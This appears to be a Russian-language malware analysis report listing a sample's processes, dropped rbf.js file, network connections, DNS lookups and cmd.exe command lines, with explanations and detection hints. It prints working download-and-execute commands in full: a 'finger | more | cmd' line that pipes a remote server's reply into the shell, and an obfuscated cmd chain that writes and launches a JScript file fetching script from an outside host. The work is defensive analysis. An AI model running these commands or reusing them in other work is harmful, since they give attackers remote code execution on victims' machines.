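Техническая информация
(Заголовки подразделов в этой копии отчёта не сохранились. Судя по содержимому, ниже по порядку перечислены: запущенные процессы, созданный файл, сетевые подключения в виде 'хост':порт, DNS-запросы и командные строки cmd.exe. Символы # в именах хостов — маскировка части имени; немаскированные имена двух хостов видны в командных строках этого же списка, и при сопоставлении индикаторов следует брать именно их.)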
- '<SYSTEM32>\finger.exe' ok@uw7dvm3awr.cargasjamef.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\rBf.js"
- C:\users\public\rbf.js
- 'uw######wr.cargasjamef.xyz':79
- 'y2####.#umicubokmtb.golf':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'uw######wr.cargasjamef.xyz':79
- 'cl###flare.com':443
- DNS ASK uw######wr.cargasjamef.xyz
- DNS ASK y2####.#umicubokmtb.golf
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- DNS ASK st####.rapidssl.com
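- '<SYSTEM32>\cmd.exe' /c finger ok@uw7dvm3awr.cargasjamef.xyz |more +2 |cmd
  (Пояснение: ответ удалённого finger-сервера, без начальных строк, отброшенных командой more +2, передаётся по конвейеру в cmd и исполняется как команды; этому соответствует подключение к порту 79 в списке выше. Признаки для обнаружения: запуск finger.exe из cmd.exe с конвейером в cmd и исходящие соединения на TCP/79 с рабочих станций.)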
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt CHRO=.j&&SEt GCIAS=vKabDarKabD a =KabD 'scKabDriKabDptKabD:'; b =KabD 'hKabDTtPKabD:'; GKabDetKabDObjKabDecKabDt(KabDa+b+'&&sET JW7G=QXOIOQXOIOy2iomr.dumicubokmtb.golfQXOIO?1QXOIO')...
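- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 9ZP1W="%GCIAS:KabD=%%JW7G:QXOIO=/%" 0<nul 1>C:\Users\Public\rBf%CHRO%s"
  (Пояснение: подстановки %GCIAS:KabD=% и %JW7G:QXOIO=/% удаляют вставку KabD и заменяют QXOIO на «/», после чего из переменных, заданных в предыдущей командной строке, складывается короткий сценарий JScript с вызовом GetObject для адреса со схемой script: и HTTP-ссылкой на хост из JW7G. Приём set /p … 0<nul 1>файл записывает эту строку в C:\Users\Public\rBf%CHRO%s, то есть в rBf.js, поскольку CHRO=.j. Строка с определением переменных в отчёте обрезана («...»), поэтому конец сценария не виден.)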
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\rBf%CHRO%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\rBf.js